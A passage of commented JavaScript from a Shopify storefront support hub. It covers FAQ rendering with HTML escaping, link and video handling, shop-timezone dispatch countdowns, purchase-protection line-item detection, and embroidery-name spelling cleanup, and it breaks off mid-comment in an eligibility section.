       own file (B4), but any future FAQ entry can still take the vimeo shape.
       dnt=1 stops Vimeo setting analytics cookies / recording the view.
       allow-same-origin is safe here: the frame is cross-origin, so it is
       confined to Vimeo's own origin, not ours.
       NOTE: using this branch reintroduces player.vimeo.com as an outbound
       host, which the current build does not have. */
    return '<div class="lc-answer__video"><iframe src="https://player.vimeo.com/video/' +
           esc(v.id) + '?dnt=1' + (hash ? "&h=" + esc(hash) : "") +
           '" title="' + esc(e.question) + '" loading="lazy" allowfullscreen ' +
           'allow="fullscreen; picture-in-picture" ' +
           'sandbox="allow-scripts allow-same-origin allow-popups allow-presentation" ' +
           'referrerpolicy="strict-origin-when-cross-origin"></iframe></div>';
  }
  return "";
}

function lcRenderAnswer(e) {
  /* Everything interpolated here is escaped. `e.answer` is the ONE deliberate
     exception: it is trusted authored HTML (<p>, <strong>, <a>). When CONFIG.faq
     moves into Shopify settings it MUST be sanitised at the point it is loaded —
     this renderer cannot tell authored markup from injected markup.

     AND THE DEEP LINK RAISED THE STAKES ON THAT, so sanitise at
     lcApplyBlobConfig() time rather than here: one gate then covers both paths.
     Before ?lc=faq&q=<id> existed, reaching a given answer meant a customer
     typing a query that happened to match it. Now a URL renders a CHOSEN entry
     unconditionally, at page load, with no interaction — which turns a stored
     -markup problem into a one-click, targetable one the moment a merchant can
     edit an answer, and the notification emails are exactly what will spread
     such links. Nothing is injectable today: `lc` and `q` are only ever used as
     lookup keys, never interpolated into markup, never stored, never sent. */
  var html = '<article class="lc-answer" data-faq="' + esc(e.id) + '">';
  html += '<h3 class="lc-answer__q">' + esc(e.question) + '</h3>';
  html += '<div class="lc-answer__body">' + e.answer + '</div>';
  if (e.video) html += lcRenderFaqVideo(e);
  if (e.action) {
    html += '<button type="button" class="lc-cta" data-lc-open="' + esc(e.action.target) + '">' +
            esc(e.action.label) + '</button>';
  }
  if (e.link) {
    var href = lcSafeHref(e.link.href);
    if (href) {
      /* A LINK STRAIGHT TO A MEDIA FILE OPENS IN A NEW TAB, ALWAYS.
         The pool-tent link points at a 7 MB MP4. In the same tab it replaced
         the whole hub with a chrome-less browser video view, and the only way
         back for this audience is the browser Back button — a real exit. Same
         disclosure pattern as trackButton(): the new tab is announced in the
         accessible name, not left as a surprise. The size warning lives in the
         label itself (see the FAQ entry), because "nothing downloads until you
         press play" is printed a few pixels above it and this is the one
         control on the screen to which that does not apply. */
      var isMedia = /\.(?:mp4|mov|webm|m4v)(?:$|[?#])/i.test(href);

      /* AND SO DOES ANYTHING THAT LEAVES THIS SITE. The rule above was written
         for the 7 MB MP4; the reason for it applies verbatim to an off-site
         link — Seel's Resolution Centre is the first one this file has — and
         to any absolute URL a merchant pastes into a link field later. In the
         same tab the hub disappears, and for this audience the browser Back
         button is not a route home, it is the moment they decide the site
         broke. Same-origin links (the policy pages, the FAQ, the tracking
         proxy) stay in the tab, because coming back from those is exactly what
         Back is for. mailto: is untouched: it opens a mail client, not a tab. */
      var offsite = false;
      if (/^https:\/\//i.test(href)) {
        var linkHost = href.slice(8).split(/[\/?#]/)[0].split("@").pop().split(":")[0].toLowerCase();
        offsite = linkHost !== String(location.hostname || "").toLowerCase();
      }
      var newTab = isMedia || offsite;

      html += '<p class="lc-answer__link"><a href="' + esc(href) + '"' +
              (newTab ? ' target="_blank" rel="noopener"' : '') + '>' +
              esc(e.link.label) +
              (newTab ? '<span class="sr-only">' + esc(t("shared.newTab")) + '</span>' : '') +
              '</a></p>';
    }
  }
  return html + "</article>";
}

/* CONFIG.urls / CONFIG.store.supportEmail are the single source of truth, but
   the same values were also hard-coded inside the FAQ answer strings — so
   changing the setting updated the button and left the FAQ link pointing at the
   old path, on the same screen. The answers now carry %%tokens%% that are
   resolved once, here. %% is used rather than Liquid's own output delimiters
   because these strings are destined for a Liquid theme — and this file
   deliberately contains no Liquid-active sequence anywhere, not even inside a
   JS comment, because Liquid renders the whole page source before the browser
   sees it and does not skip <script> bodies. */
function lcResolveFaqTokens() {
  /* ONE token table for the whole file — lcTokenMap(), which t() also uses, so
     an answer and a copy override cannot resolve %%refundPolicy%% differently. */
  var sub = lcResolveTokens;
  CONFIG.faq.forEach(function (e) {
    if (e.answer) e.answer = sub(e.answer);
    if (e.link && e.link.href) e.link.href = sub(e.link.href);
    /* Media URLs are tokenised too, so a self-hosted video is declared in
       CONFIG.urls once and referenced from the FAQ entry by name. */
    if (e.video) {
      if (e.video.src)    e.video.src    = sub(e.video.src);
      if (e.video.poster) e.video.poster = sub(e.video.poster);
    }
  });
}

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   SHARED HELPERS
   =========================================================================== */
function esc(s) {
  return String(s == null ? "" : s)
    .replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")
    .replace(/"/g,"&quot;").replace(/'/g,"&#39;");
}
function $(sel, root) { return (root || document).querySelector(sel); }
function $$(sel, root) { return Array.prototype.slice.call((root || document).querySelectorAll(sel)); }
function money(n) { return "$" + Number(n).toFixed(2); }

/* MERCHANT-TYPED LINE BREAKS. Copy that comes from a `"type": "textarea"`
   setting can contain newlines, and a textarea INVITES them — the client can
   press Enter, see three paragraphs in the theme editor, and get one run-on
   block on the storefront, because HTML collapses a bare "\n" to a space.
   There is no error and nothing to attribute it to. So the one screen whose
   intro is a textarea renders through here instead: a blank line starts a new
   paragraph, a single newline becomes a <br>, and a run of blank lines does
   not emit empty <p>s.

   DELIBERATELY NOT ESCAPED, exactly like the direct interpolation it replaced.
   These strings are merchant-authored and some of them ship real markup
   (lookup.spamNote contains <strong>), so escaping here would print the tags.
   The blob in sections/contact-hub.liquid is emitted through `| json` with
   `</` neutralised, which is what stops a setting closing the script tag.
   Pass ONLY copy-dictionary values to this function — never customer input,
   which goes through esc(). */
function noteParas(str, cls) {
  var raw = String(str == null ? "" : str).replace(/\r\n?/g, "\n");
  var blocks = raw.split(/\n{2,}/);
  var out = "";
  for (var i = 0; i < blocks.length; i++) {
    var b = blocks[i].replace(/^\n+|\n+$/g, "");
    if (!b.replace(/\s+/g, "")) continue;          // blank / whitespace-only
    out += '<p class="' + cls + '">' + b.replace(/\n/g, "<br>") + '</p>';
  }
  return out;
}

/* Populating a role="alert" node while it is still display:none and unhiding
   it afterwards does NOT reliably announce in NVDA/JAWS/VoiceOver — the
   mutation happens in a non-rendered subtree, so there is nothing for the
   assistive tech to observe. Unhide FIRST, then write the text on the next
   frame, so the change lands in a live, rendered element. Every inline error in
   this file goes through here. */
function revealAlert(node, msg) {
  if (!node) return;
  node.textContent = "";
  node.hidden = false;
  /* setTimeout, NOT requestAnimationFrame: rAF is paused entirely while the
     tab is hidden, so a background/restored tab would unhide an empty box and
     never write the message into it. A timer always fires. */
  setTimeout(function () { node.textContent = msg; }, 16);
}
function reducedMotion() {
  return window.matchMedia && window.matchMedia("(prefers-reduced-motion: reduce)").matches;
}
function fmtDate(iso) {
  var d = new Date(iso);
  /* Month names and the ORDER of the three parts are both copy keys, so the
     hub can be reworded ("August 31, 2026") without a code change. */
  return t("shared.date.full", {
    day:   d.getDate(),
    month: t("shared.month." + (d.getMonth() + 1)),
    year:  d.getFullYear()
  });
}

/* ---- shop-timezone dates -------------------------------------------------
   Everything the customer sees is fine in their own timezone. Anything sent
   to the 3PL is NOT: they locate an unshipped order by date in the
   day's manifest, and fmtDate() above uses the browser's clock. An order
   placed 09:00Z reads as the previous day for a US customer, so the date in the
   Discord message and the date in Shopify admin disagree by one.
   CONTEXT: shop country New Zealand, timezone NZST. */
var SHOP_TZ = "Pacific/Auckland";

function shopDateParts(iso) {
  var d = new Date(iso);
  try {
    var p = new Intl.DateTimeFormat("en-NZ", {
      timeZone: SHOP_TZ, year:"numeric", month:"long", day:"numeric"
    }).formatToParts(d).reduce(function (acc, x) { acc[x.type] = x.value; return acc; }, {});
    return { day:p.day, month:p.month, year:p.year, key:p.year + "-" + p.month + "-" + p.day };
  } catch (e) {
    /* Intl or the tz database unavailable — degrade to the browser clock. */
    return { day:String(d.getDate()), month:"", year:String(d.getFullYear()),
             key:d.toDateString(), fallback:true };
  }
}

function fmtShopDate(iso) {
  var p = shopDateParts(iso);
  return p.fallback ? fmtDate(iso) : (p.day + " " + p.month + " " + p.year);
}

/* "today (31 July 2026)" or "on (30 July 2026)". */
function fmtPlacedPhrase(iso) {
  var placed = shopDateParts(iso), today = shopDateParts(new Date().toISOString());
  return t(placed.key === today.key ? "shared.placed.today" : "shared.placed.on",
           { date: fmtShopDate(iso) });
}
function fmtDateTime(iso) {
  var d = new Date(iso);
  return t("shared.date.time", {
    date: fmtDate(iso),
    time: d.toLocaleTimeString([], { hour:"2-digit", minute:"2-digit" })
  });
}
/* THE ONLY AGE HELPER, and it takes the order on purpose. It used to be
   `hoursSince(iso)` measuring against Date.now() — the customer's device clock
   — which is the bug documented at nowMs() below: a tablet running two days
   slow made a parcel labelled 60 hours ago come out at 12h and get offered a
   live cancel form. When evaluate() was moved onto nowMs() this was left
   behind with no callers, which is worse than useless: it is a helper with the
   obvious name sitting one screen above the comment explaining why it must not
   exist. So it now takes `order` and delegates. Anything deciding eligibility
   MUST pass the order through. */
function hoursSince(iso, order) {
  return (nowMs(order) - new Date(iso).getTime()) / 3600000;
}

/* "Now", preferring the SERVER's clock over the customer's device.
   ---------------------------------------------------------------------------
   Every age this hub reasons about — how old the order is, how old the tracking
   label is — compares a server timestamp against a clock. Using the browser's
   clock for that side of the subtraction means a device whose time is wrong
   decides whether we offer to cancel a parcel. Older tablets with a flat RTC
   battery, and any device that has never reached a time server, are routinely
   hours or days out; a slow clock made a dispatched parcel look interceptable
   and a fast one produced negative ages.

   `order.serverNow` is an OPTIONAL ISO timestamp the Worker stamps on the
   response ("this is what MY clock said when I answered"). When it is present
   we anchor every age to it, keeping server time on both sides of the
   subtraction and adding the elapsed time since the response arrived. When it
   is absent — today, and for any order object that never came from the Worker —
   this is exactly Date.now(), so nothing changes.
   WIRING IT IS ONE LINE IN THE WORKER: add serverNow to the JSON payload. */
function nowMs(order) {
  var anchor = order && order._serverNowMs;
  if (!anchor) return Date.now();
  return anchor + (Date.now() - order._serverNowSeenMs);
}

/* ---- the dispatch schedule ------------------------------------------------
   The 3PL fulfils EVERY DAY EXCEPT SUNDAY, so the countdown has to skip the
   days they do not work. The old version added exactly 24 hours to a fixed
   02:50Z batch, which on a Saturday evening counted a customer down to a Sunday
   dispatch that never happens — and then rolled over to another one.

   All of it is DISPLAY ONLY. Nothing here decides eligibility; that is
   evaluate(), on real fulfilment state.
   -------------------------------------------------------------------------- */

/* How many minutes ahead of UTC `tz` is at instant `date`. Derived from Intl
   rather than hard-coded, so NZDT (+13) and NZST (+12) both come out right
   without a timezone library and without a daylight-saving table to maintain. */
function tzOffsetMinutes(date, tz) {
  var p = new Intl.DateTimeFormat("en-US", {
    timeZone: tz, hour12: false,
    year: "numeric", month: "2-digit", day: "2-digit",
    hour: "2-digit", minute: "2-digit", second: "2-digit"
  }).formatToParts(date).reduce(function (acc, x) { acc[x.type] = x.value; return acc; }, {});
  /* hour comes back as "24" at midnight in some engines. */
  var asIfUtc = Date.UTC(Number(p.year), Number(p.month) - 1, Number(p.day),
                         Number(p.hour) % 24, Number(p.minute), Number(p.second));
  return (asIfUtc - Math.floor(date.getTime() / 1000) * 1000) / 60000;
}

/* The UTC instant at which the wall clock in `tz` reads y-m-d hh:mm.
   Resolved twice because the offset used to place the guess may itself change
   across the guess — the classic DST-boundary off-by-an-hour. */
function zonedWallClockToUtc(y, m, d, hh, mm, tz) {
  var guess = Date.UTC(y, m - 1, d, hh, mm, 0);
  var t = guess - tzOffsetMinutes(new Date(guess), tz) * 60000;
  return new Date(guess - tzOffsetMinutes(new Date(t), tz) * 60000);
}

/* Local calendar date + weekday in `tz` for an instant. */
function zonedDateParts(date, tz) {
  var p = new Intl.DateTimeFormat("en-US", {
    timeZone: tz, year: "numeric", month: "2-digit", day: "2-digit"
  }).formatToParts(date).reduce(function (acc, x) { acc[x.type] = x.value; return acc; }, {});
  return { y: Number(p.year), m: Number(p.month), d: Number(p.day) };
}

/* Next dispatch cutoff, as a UTC instant. Walks forward one CALENDAR day at a
   time — arithmetic done on the date parts through Date.UTC, never by adding
   86400000ms to a local time, which double-counts or skips a day across a
   daylight-saving change. */
function nextDispatchUtc(from) {
  var f    = CONFIG.fulfillment;
  var now  = from ? new Date(from) : new Date();
  var days = (f.dispatchDays && f.dispatchDays.length) ? f.dispatchDays : [0,1,2,3,4,5,6];
  var cut  = String(f.dispatchCutoffLocal || "15:00").split(":");
  var cutH = Number(cut[0]) || 0, cutM = Number(cut[1]) || 0;

  try {
    var start = zonedDateParts(now, f.dispatchTimezone);
    var cal   = Date.UTC(start.y, start.m - 1, start.d);
    /* 14 days is more than a fortnight of closures — far more headroom than
       "closed Sundays" needs, and it guarantees the loop terminates. */
    for (var i = 0; i < 14; i++) {
      var day = new Date(cal + i * 86400000);
      if (days.indexOf(day.getUTCDay()) === -1) continue;         // a day they do not dispatch
      var when = zonedWallClockToUtc(day.getUTCFullYear(), day.getUTCMonth() + 1,
                                     day.getUTCDate(), cutH, cutM, f.dispatchTimezone);
      if (when > now) return when;                                 // today's cutoff may already be gone
    }
  } catch (e) { /* no Intl timezone database — fall through */ }

  /* FALLBACK: plain UTC clock, still skipping non-dispatch days. Weekday is
     read in UTC here, which can differ from the shop's weekday by a few hours
     either side of midnight; acceptable for a countdown of last resort. */
  var c = new Date(now);
  c.setUTCHours(f.batchHourUtc, f.batchMinuteUtc, 0, 0);
  if (c <= now) c.setUTCDate(c.getUTCDate() + 1);
  for (var g = 0; g < 14 && days.indexOf(c.getUTCDay()) === -1; g++) {
    c.setUTCDate(c.getUTCDate() + 1);
  }
  return c;
}
function fmtCountdown(ms) {
  if (ms < 0) ms = 0;
  var total = Math.floor(ms / 1000);
  var h = Math.floor(total / 3600), m = Math.floor((total % 3600) / 60), s = total % 60;
  /* Over a day, spill into days and drop the seconds. A Saturday-evening order
     counts down to Monday, and "43h 00m 00s" is a number an older reader has to
     do arithmetic on before it means anything. Ticking seconds on a two-day
     countdown are noise as well. */
  if (h >= 24) {
    var d = Math.floor(h / 24);
    return t("shared.countdown.long", {
      days:    d,
      dayWord: t(d === 1 ? "shared.countdown.dayOne" : "shared.countdown.dayMany"),
      hours:   h % 24,
      minutes: String(m).padStart(2, "0")
    });
  }
  return t("shared.countdown.short", {
    hours:   h,
    minutes: String(m).padStart(2, "0"),
    seconds: String(s).padStart(2, "0")
  });
}

/* "every day except Sunday" — computed from CONFIG.fulfillment.dispatchDays so
   the customer-facing sentences cannot drift out of step with the schedule the
   countdown is actually using. Used by the status timeline and policyNote(). */
function lcDayName(i) { return t("shared.day." + i); }
function dispatchDaysPhrase() {
  var days = CONFIG.fulfillment.dispatchDays;
  if (!days || !days.length || days.length === 7) return t("shared.dispatch.everyDay");
  if (days.length === 6) {
    for (var i = 0; i < 7; i++) {
      if (days.indexOf(i) === -1) return t("shared.dispatch.everyDayExcept", { day: lcDayName(i) });
    }
  }
  return days.slice().sort().map(lcDayName).join(", ");
}

/* --- order-shape accessors ------------------------------------------------ */
/* SEEL DETECTION — THREE CASE-FOLDED `contains` TESTS: vendor, then SKU, then
   title, in that order.

   IT IS THE SAME TEST, IN THE SAME ORDER, AS THE §0 PASS IN EMAIL-TEMPLATES.md
   AND AS worker/src/shopify.js. That parity is the whole point. The order
   confirmation is the surface that PROMISES the cover ("you are protected,
   tell Seel within 7 days"); if the hub the email links to cannot see what the
   email saw, that customer is routed down the ordinary returns path with no
   Resolution Center and no deadline warning, and the missed window lands on
   Little Cubs. Widen one, widen all three — and worker/test/contract.test.js
   pins them against each other so the suite goes red if you do not.

   WHY `contains` AND NOT `===`. Seel ships this line as vendor `Seel` and
   `Seel Inc.`, as SKU `SEEL-WFP` and `SEEL-WFP-US`, and as title
   `Worry-Free Purchase` and `Worry-free Purchase`, in different merchant
   accounts. This store's own pre-existing refund policy names the underwriter
   "Seel Inc". Exact equality missed every one of those, silently.

   THE NEEDLES ARE THE SETTINGS, not literals — CONFIG.seel.vendor / .sku /
   .title, so the client can follow Seel from the theme editor without a code
   change. A BLANK needle matches nothing rather than everything:
   "".indexOf("") is 0, so an unguarded test on a cleared setting would call
   every line on every order purchase protection. LC_REQUIRED_STRINGS restores
   a blanked setting, but this must not depend on that having run first.

   TITLE IS THE LAST RESORT AND MATCHES THE WHOLE PHRASE. Matching the fragment
   "worry free" would fire on a toy called "Worry Free Sleep Plushy" — which
   would both promise cover nobody bought and drop that toy out of realItems(),
   so the customer could not return the thing they actually have. Hyphens fold
   to spaces on both sides of the title test only, so the one needle covers
   `Worry-Free Purchase` and `Worry free purchase` alike; vendor and SKU fold
   case only, exactly as the Liquid pass does with `downcase` and `upcase`. */
function lcSeelLower(s) { return String(s == null ? "" : s).toLowerCase().trim(); }
function lcSeelUpper(s) { return String(s == null ? "" : s).toUpperCase().trim(); }
function lcSeelPhrase(s) {
  return String(s == null ? "" : s).toLowerCase().replace(/-/g, " ").replace(/\s+/g, " ").trim();
}
function lcSeelHas(hay, needle, fold) {
  var n = fold(needle);
  if (!n) return false;                       // a cleared setting matches nothing
  return fold(hay).indexOf(n) > -1;
}
function isSeel(li) {
  if (!li) return false;
  return lcSeelHas(li.vendor, CONFIG.seel.vendor, lcSeelLower) ||
         lcSeelHas(li.sku,    CONFIG.seel.sku,    lcSeelUpper) ||
         lcSeelHas(li.title,  CONFIG.seel.title,  lcSeelPhrase);
}
function realItems(order) { return order.lineItems.filter(function (li) { return !isSeel(li); }); }
function hasSeel(order)   { return order.lineItems.some(isSeel); }

/* WHICH RETURN REASONS SEEL IS THE FIRST STOP FOR, on a covered order.

   THERE IS NO SECOND TABLE. This used to be its own map of reason ids, and it
   disagreed with worker/src/returns.js on two of the six: it routed `faulty`,
   which the Worker said it should not, and it did NOT route `never-arrived`,
   which the Worker said it should — while the deadline copy on the screen
   before it told the customer, in three separate places, to take exactly that
   situation ("the tracking says delivered and nothing turned up") to Seel
   inside 7 days. A customer who ticked "It never turned up" was routed past
   the Resolution Center into our ordinary flow with the clock running.

   So the flag lives on the RETURN_REASONS mirror below, copied field-for-field
   from the Worker like every other field on it, and this reads it. Two tables
   of the same rule drift; one does not. worker/test/contract.test.js pins
   `seelFirst` across both files the way it already pins the reason ids.

   WHAT ROUTES, AND WHY. Worry-Free Purchase covers what happens to the PARCEL
   — delayed, lost, stolen, or damaged on the way. `damaged-in-transit` and
   `never-arrived` are squarely that, and both carry a deadline short enough to
   be missed. `faulty` routes too, because the customer holding a broken thing
   does not sort "damaged on the way" from "faulty out of the box" the way this
   taxonomy does; the screen says that difference out loud, above the claim
   button rather than below it — see returns.seel.faultyNote.

   NOTHING ELSE ROUTES. "Changed my mind" and "not as described" are ours and
   ours alone; offering a Seel claim on either sends someone to be told no by a
   third party, which is a support ticket with extra steps.

   THIS IS NOT A CLAIM THAT THE CLAIM IS COVERED. Seel decide that, on their
   own terms, which vary by merchant plan and change without telling us. Every
   string this predicate reaches is written to be true whether Seel pay out or
   not, and the ordinary returns process stays one tap away on the same screen. */
function seelRoutes(order, reasonId) {
  if (!order || !hasSeel(order)) return false;
  var key = String(reasonId == null ? "" : reasonId).trim().toLowerCase();
  var reason = lcHasOwn(RETURN_REASONS, key) ? RETURN_REASONS[key] : null;
  return !!(reason && reason.seelFirst === true);
}

/* ===========================================================================
   PERSONALISATION — reading the line item property back off the order.

   normaliseOrder() has already reduced every shape Shopify or the Worker can
   return to one array of {key,value} per line item, so everything below is a
   plain lookup with no defensive unwrapping.

   THE KEY MATCH IS CASE-INSENSITIVE AND TRIMMED. The property key is typed by
   whoever builds the product form, in Liquid, by hand, on two different draft
   products, and " Name" or "name" would otherwise mean the personalisation is
   invisible to this flow while still being perfectly visible to the 3PL — the
   worst possible split, because the customer would be told their order has
   nothing personalised on it while a name goes out to be stitched.
   =========================================================================== */
function personalisationEnabled() {
  return !!(CONFIG.personalisation && CONFIG.personalisation.enabled);
}

/* THE ONE READER FOR CONFIG.show — see the block comment on it.

   FAILS TOWARDS SHOWING. Only an explicit `false` hides anything: a missing
   key, an older section that does not emit the flag, `null` from a Liquid
   value that was never set, a typo'd key name — all of them render the block.
   The alternative (truthiness) would make one missing line in the config blob
   silently delete a card from a live storefront, which is the failure mode a
   merchant cannot diagnose and cannot undo from the theme editor. */
function shown(key) {
  return !CONFIG.show || CONFIG.show[key] !== false;
}

/* The hub's own header bar. In the theme the section simply does not emit the
   markup when the checkbox is off, so this is a no-op there; it exists so the
   standalone prototype — whose header is static markup — honours the same flag,
   and so a merchant toggling it in the theme editor sees the change without a
   full page reload. */
function lcApplyHeaderVisibility() {
  var host = document.getElementById("lc-hub");
  var hdr = host && host.querySelector ? host.querySelector(".lc-header") : null;
  if (!hdr) return;
  hdr.style.display = shown("header") ? "" : "none";
}

function personalisationKey() {
  return String((CONFIG.personalisation && CONFIG.personalisation.propertyKey) || "Name");
}

function personalisationMaxLength() {
  var n = Number(CONFIG.personalisation && CONFIG.personalisation.maxLength);
  return n > 0 ? n : 10;
}

/* The rules line carries %%maxLength%% rather than a hard-coded "10", because
   the limit is an independently tunable setting. It used to say "up to 10
   characters" directly above a counter reading "0 of 8 characters", with a 9th
   character being silently dropped between them. Substituted at render, next
   to the same %%token%% handling the FAQ answers use. */
function spellingRulesCopy()    { return t("spelling.form.rules"); }
function spellingNonLatinCopy() { return t("spelling.form.nonLatin"); }

/* Returns the property's value, or "" when this line item does not carry it. */
function lineItemProperty(li, key) {
  var want = String(key || "").trim().toLowerCase();
  var list = (li && li.customAttributes) || [];
  for (var i = 0; i < list.length; i++) {
    if (String(list[i].key).trim().toLowerCase() === want) return list[i].value;
  }
  return "";
}

/* The personalised lines on an order: the ones carrying a non-empty value under
   CONFIG.personalisation.propertyKey. Seel protection is filtered out with
   realItems() for the same reason it is everywhere else — it is cover, not a
   thing anyone stitches.

   AN EMPTY VALUE IS NOT PERSONALISED. A `Name` property that arrived blank
   (a theme change, a bad import, an app writing the key with no value) has
   nothing to correct, and offering "change the spelling of ''" is worse than
   saying this order has no personalised items. */
function personalisedItems(order) {
  if (!order || !order.lineItems) return [];
  var key = personalisationKey();
  return realItems(order).filter(function (li) {
    return String(lineItemProperty(li, key)).trim() !== "";
  });
}

/* ---------------------------------------------------------------------------
   THE SPELLING RULES — shared by the hub flow and, verbatim, by the product-page
   snippet. Same limit, same whitelist, same normalisation, or a name that was
   accepted at checkout becomes unfixable here.

   WHAT IS ALLOWED: letters (including accented Latin, so José and Chloë work),
   spaces, hyphens and apostrophes. That is what an embroidery machine can
   stitch from a standard alphabet template. Everything else — emoji, symbols,
   control characters, other scripts — is dropped, because the alternative is a
   support ticket at best and a wrong parcel at worst.

   THE RANGES ARE SPELT OUT RATHER THAN USING \p{L}. Unicode property escapes
   need the /u flag and are unsupported on older Safari and every pre-2018
   browser; this audience is not on new phones. The ranges below deliberately
   skip U+00D7 (×) and U+00F7 (÷), which sit inside the Latin-1 letter block and
   are not letters.

   WRITTEN WITH \u ESCAPES ON PURPOSE. This file is edited, pasted between
   editors and will shortly be copied into a Liquid asset; a literal "À-Ö" in a
   character class is one bad save away from becoming mojibake that silently
   rejects every accented name. Escapes survive that trip.
   --------------------------------------------------------------------------- */
var SPELL_DISALLOWED_RE =
  /[^A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u024F\u1E00-\u1EFF '\-]/g;

/* Fold the characters a phone keyboard substitutes silently BEFORE validating,
   rather than rejecting them: iOS silently turns a straight apostrophe into a
   curly one as you type, and telling a parent their apostrophe is an illegal
   character when their own keyboard put it there is indefensible. Same for the
   dash family, for a non-breaking space, and for any newline pasted in out of
   a confirmation email. */
/* Unicode normalisation, on its own, because two places need it: spellFold()
   before it judges what the customer typed, and spellingDraftFor() before it
   stores what the ORDER already says. Both matter. The order value arrives
   however the product page happened to save it, and a decomposed "José" is a
   different STRING from a precomposed one while being the same NAME — so the
   "that is exactly what we have saved already" guard did not fire, and the
   flow cheerfully raised a request to change José to José: a real interruption
   for the packing team, and a diff the customer cannot see any difference in.
   Guarded for engines predating String.prototype.normalize. */
function spellNfc(raw) {
  var s = String(raw == null ? "" : raw);
  if (s.normalize) { try { return s.normalize("NFC"); } catch (e) {} }
  return s;
}

function spellFold(raw) {
  /* NFC FIRST, AND IT MUST BE FIRST. SPELL_DISALLOWED_RE lists only
     PRECOMPOSED Latin code points, so in a DECOMPOSED (NFD) string the
     combining acute in "Jos" + U+0301 is not in the whitelist and is dropped:
     José silently became Jose, and the flow built to stop a wrong name being
     stitched generated a request to stitch a wrong name — "José → Jose" — over
     copy telling the customer everything else was exactly as they typed it.
     NFD is what macOS produces and what a great deal of pasted Word / PDF /
     email text carries, and pasting the spelling from somewhere trusted is
     exactly what a parent does here. Normalising first turns the pair back
     into U+00E9 before anything judges it.

     poNormalise() and lcNorm() in this same file already do this; the omission
     was here. The guard is for engines predating String.prototype.normalize —
     they keep the old behaviour rather than throwing. */
  return spellNfc(raw)
    .replace(/[\u2018\u2019\u02BC\u02B9\u2032]/g, "'")        // curly / prime apostrophes
    .replace(/[\u2010-\u2015\u2212\u2043]/g, "-")            // dash family -> hyphen
    .replace(/[\u00A0\u2000-\u200A\u202F\u205F\u3000]/g, " ") // exotic / non-breaking spaces
    .replace(/[\r\n\t]+/g, " ");
}

/* Returns { value, stripped, truncated } — the cleaned value plus what had to
   be done to it, so the UI can say so politely instead of silently changing
   what someone typed. */
function spellClean(raw) {
  var folded = spellFold(raw);
  var kept = folded.replace(SPELL_DISALLOWED_RE, "");
  var stripped = kept.length !== folded.length;
  var max = personalisationMaxLength();
  var truncated = kept.length > max;
  if (truncated) kept = kept.slice(0, max);
  /* `emptied`: they typed something real and NOTHING survived — a name in a
     script the embroidery template cannot hold. It needs its own message,
     because "everything else is exactly as you typed it" is simply false when
     there is no everything else. Whitespace-only is not "emptied", it is
     empty. */
  var emptied = !kept && /\S/.test(folded);
  return { value: kept, stripped: stripped, truncated: truncated, emptied: emptied };
}

/* At least one letter. "---", "'''" and "- - -" are non-empty, canonicalise to
   themselves and would otherwise pass every layer as a perfectly valid
   embroidery instruction. Mirror this in the server-side check. */
var SPELL_LETTER_RE = /[A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u024F\u1E00-\u1EFF]/;
function spellHasLetter(s) { return SPELL_LETTER_RE.test(String(s == null ? "" : s)); }

/* What actually goes on the order: collapse runs of spaces and trim the ends.
   A trailing space is invisible on screen and is a real difference in an
   embroidery file, so it is removed here rather than sent to the 3PL. */
function spellCanonical(raw) {
  return spellClean(raw).value.replace(/\s+/g, " ").trim();
}

/* De-duplicated by tracking number — a consolidated 3PL shipment routinely puts
   the same number on more than one fulfilment.

   THE DE-DUPLICATION MUST NOT LOSE THE OLDEST TIMESTAMP. It used to keep the
   first entry in Shopify's array order and throw the other fulfilment's
   createdAt away, so trackingAssignedAt()'s "earliest assignment" guarantee held
   only if the API happened to return fulfilments oldest-first. Two fulfilments
   carrying YT1, one 2h old and one 60h old, gave TRACKING_ASSIGNED (a live
   cancel form) or DISPATCHED (a refusal) purely on array order. Fold the
   earlier createdAt into the entry we already have instead. */
function trackingList(order) {
  var out = [], seen = {};
  (order.fulfillments || []).forEach(function (f) {
    (f.trackingInfo || []).forEach(function (t) {
      if (!t || !t.number) return;
      var key = String(t.number).trim();
      var existing = seen[key];
      if (existing) {
        var a = new Date(existing.shippedAt).getTime();
        var b = new Date(f.createdAt).getTime();
        if (!isNaN(b) && (isNaN(a) || b < a)) existing.shippedAt = f.createdAt;
        return;
      }
      /* `company` and `url` are CAPTURED AND NEVER RENDERED, on purpose.
         Nothing customer-facing may name the carrier (see CONFIG.fulfillment),
         and the tracking link the customer gets is our own /apps/17TRACK page,
         not whatever URL the carrier put on the fulfilment. They are kept on
         the record so the staff-facing side — the Discord/Notion payload the
         Worker builds from this same object — can stay accurate without a
         second pass over order.fulfillments. If you add a customer-facing
         renderer, do not reach for these two. */
      var rec = { number:key,
                  company:t.company || CONFIG.fulfillment.carrier,
                  url:t.url || null,
                  shippedAt:f.createdAt };
      seen[key] = rec;
      out.push(rec);
    });
  });
  return out;
}

/* The headline item — used in the Discord one-liners, which are single-item
   by format. Picks the largest non-Seel line. */
function headlineItem(order) {
  var items = realItems(order);
  if (!items.length) return null;
  return items.slice().sort(function (a,b) { return b.quantity - a.quantity; })[0];
}

/* SHOPIFY'S SENTINEL FOR "THIS PRODUCT HAS NO REAL VARIANTS" IS THE STRING
   "Default Title", NOT "Default". Testing only for "Default" printed
   "Pool Tent (Default Title)" — on screen here, and in the Discord message the
   packing team reads, whose whole job is to identify one item.
   Suppress both. `itemLabel()` in worker/src/shopify.js does the same and the
   two must move together. */
function itemLabel(li) {
  var variant = li.variantTitle;
  return li.title + (variant && variant !== "Default" && variant !== "Default Title"
    ? " (" + variant + ")" : "");
}

function notionProducts(order) {
  var seen = {}, out = [];
  realItems(order).forEach(function (li) {
    var mapped = CONFIG.productMap[li.title] || "Unknown";
    if (!seen[mapped]) { seen[mapped] = 1; out.push(mapped); }
  });
  return out.length ? out : ["Unknown"];
}

function addressBlock(a) {
  return [
    a.name || ((a.firstName || "") + " " + (a.lastName || "")).trim(),
    a.company,
    a.address1,
    a.address2,
    [a.city, a.provinceCode || a.province, a.zip].filter(Boolean).join(", "),
    a.country,
    a.phone
  ].filter(function (l) { return l && String(l).trim(); }).join("\n");
}

/* ===========================================================================
   ELIGIBILITY — the decision the whole hub turns on.

   PRIMARY  : real Shopify fulfilment state.
   SECONDARY: the 12h policy window, shown for context only.

   Measured: 16/30 orders shipped within 12h, 14/30 after. A fixed 12h rule
   mispredicts ~47% of the time, and the lenient direction is the dangerous
